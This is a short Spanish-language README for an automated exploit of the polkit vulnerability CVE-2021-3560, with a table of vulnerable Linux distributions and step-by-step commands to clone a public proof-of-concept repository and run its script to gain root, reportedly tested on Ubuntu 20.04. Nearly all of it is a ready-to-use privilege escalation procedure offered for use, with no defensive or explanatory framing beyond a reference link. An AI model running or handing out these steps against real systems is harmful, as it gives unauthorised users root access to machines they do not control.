
script de explotación de polkit v1.0
script de explotación de polkit
Script automatizado para escalar a root usando el servicio polkit
| Distribución | ¿Vulnerable? |
|---|---|
| RHEL 7 | No |
| RHEL 8 | Sí |
| Fedora 20 (or earlier) | No |
| Fedora 21 (or later) | Sí |
| Debian 10 (“buster”) | No |
| Debian testing (“bullseye”) | Sí |
| Ubuntu 18.04 | No |
| Ubuntu 20.04 | Sí |
ssh localhost
git clone https://github.com/tyleraharrison/CVE-2021-3560_PoC.git
cd CVE-2021-3560_PoC
./polkitRoot.sh
dos2unix polkitRoot.sh porque GitHub los cambió a CRLF y Bash no lo toleraProbado en Ubuntu 20.04
Referencia: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/